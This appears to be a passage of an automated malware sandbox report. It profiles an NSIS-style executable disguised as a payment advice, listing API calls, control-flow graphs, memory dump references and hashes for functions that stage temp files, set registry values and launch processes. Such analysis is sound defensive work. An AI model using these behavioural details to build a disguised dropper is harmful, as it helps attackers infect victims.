• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
• Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
• Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
• Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E

Control-flow Graph (function at 402dbc; legend: Executed / Not Executed; graph image omitted)
APIs
• GetTickCount.KERNEL32 ref: 00402DD0
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,00000400), ref: 00402DEC
  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,80000000,00000003), ref: 00402E35
• GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$v]!
• API String ID: 2803837635-2231877437
• Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
• Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
• GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
• lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
• lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
• GlobalFree.KERNEL32(00000000), ref: 10001CAF
• GlobalFree.KERNEL32(?), ref: 10001DA9
• GlobalFree.KERNEL32(?), ref: 10001DAE
• GlobalFree.KERNEL32(?), ref: 10001DB3
• GlobalFree.KERNEL32(00000000), ref: 10001F57
• lstrcpyW.KERNEL32(?,?), ref: 100020BB
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
• Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
• Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
• Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
• Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

Control-flow Graph (function at 401752; legend: Executed / Not Executed; graph image omitted)
APIs
• lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende,?,?,00000031), ref: 00401793
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende,?,?,00000031), ref: 004017B8
  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Local\Temp\nsh2473.tmp$C:\Users\user\AppData\Local\Temp\nsh2473.tmp\System.dll$C:\Users\user\AppData\Local\foreslaaende$Call
• API String ID: 1941528284-3169595403
• Opcode ID: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
• Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
• Opcode Fuzzy Hash: d911f2a5e86815fddb17de9d1bc7295e402278fca2ec962f4dae8fec1f8af932
• Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E

Control-flow Graph (function at 40317d; legend: Executed / Not Executed; graph image omitted)
APIs
• GetTickCount.KERNEL32 ref: 00403192
  • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
• WriteFile.KERNELBASE(0040BE78,0040D60C,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
• SetFilePointer.KERNELBASE(00215D76,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                                          • String ID: v]!$x>A
                                                                                                                                          • API String ID: 2146148272-1808354312
                                                                                                                                          • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                          • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                          • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED

Control-flow Graph: function at 00403062 (rendered graph omitted; nodes were marked Executed / Not Executed; the graph calls SetFilePointer, ReadFile and WriteFile, with subcalls to 0040317D and 00405BD9)
APIs
• SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
• WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$PointerWrite
• String ID: v]!$x>A
• API String ID: 539440098-1808354312
• Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
• Instruction ID: dc2c699ff297b31fb9e84695071232237a0836a1395088a2783af72dccbdbb3b
• Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
• Instruction Fuzzy Hash: A8312871500219EBDF10CF65EC44AAA3FBCEB08755F20813AF905AA1A0D3349E50DBA9

Control-flow Graph: function at 00402331 (rendered graph omitted; nodes were marked Executed / Not Executed; the graph calls RegCreateKeyExW, lstrlenW, RegSetValueExW and RegCloseKey, with subcalls to 00402C2F, 00402B3A, 00402B1D and 00403062)
APIs
• RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
• lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
• RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsh2473.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsh2473.tmp
• API String ID: 1356686001-2395162201
• Opcode ID: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
• Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
• Opcode Fuzzy Hash: 82ce1d6cb996bcf412ebbe99ed0769093b12cc40c1c1e49e2153e81d35d28ea4
• Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69

Control-flow Graph: function at 004015B9 (rendered graph omitted; nodes were marked Executed / Not Executed; the graph calls CreateDirectoryW, GetLastError, GetFileAttributesW and SetCurrentDirectoryW, with subcalls to 00402B3A, 004059E0, 00405962, 00401423 and 00405EEA)
APIs
  • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,75922EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 004059EE
  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
  • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
• CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\foreslaaende,?,00000000,000000F0), ref: 00401630
Strings
• C:\Users\user\AppData\Local\foreslaaende, xrefs: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
• String ID: C:\Users\user\AppData\Local\foreslaaende
• API String ID: 3751793516-1954961325
• Opcode ID: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
• Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
• Opcode Fuzzy Hash: fcdce739e0d94f26b1e3fbe2d5c138577a95ee6fa10370c5d64eef2b3acfb5ce
• Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E

Control-flow Graph: function at 10001771 (rendered graph omitted; nodes were marked Executed / Not Executed; the graph calls GlobalFree and FreeLibrary, with subcalls to 10001B3E, 100022EB, 100022A1, 1000248D, 100015CC, 10001280, 10002868, 10002B23, 1000260B, 10002450 and 10001555)
APIs
  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
  • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
• GlobalFree.KERNEL32(00000000), ref: 1000181C
• FreeLibrary.KERNEL32(?), ref: 10001893
• GlobalFree.KERNEL32(00000000), ref: 100018B8
  • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
  • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
  • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
  • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
  • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
  • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
Strings
Memory Dump Source
• Source File: 00000000.00000002.2690936672.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2690910719.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2690980563.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2691009289.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpywsprintf
• String ID:
• API String ID: 1767494692-3916222277
• Opcode ID: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
• Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
• Opcode Fuzzy Hash: ee44118ed5f66a04bcbaddb203534a3c862fc054acfad86daf15ba6692a0e061
• Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1050 405db7-405de9 RegOpenKeyExW 1051 405e2b-405e2e 1050->1051 1052 405deb-405e0a RegQueryValueExW 1050->1052 1053 405e18 1052->1053 1054 405e0c-405e10 1052->1054 1056 405e1b-405e25 RegCloseKey 1053->1056 1055 405e12-405e16 1054->1055 1054->1056 1055->1053 1055->1056 1056->1051
                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                          • String ID: Call
                                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                          • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                          • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1057 405b85-405b91 1058 405b92-405bc6 GetTickCount GetTempFileNameW 1057->1058 1059 405bd5-405bd7 1058->1059 1060 405bc8-405bca 1058->1060 1062 405bcf-405bd2 1059->1062 1060->1058 1061 405bcc 1060->1061 1061->1062
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                          • API String ID: 1716503409-44229769
                                                                                                                                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                          • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                                                                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                                                                          • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                            • Part of subcall function 00405665: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                                                                            • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                           • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
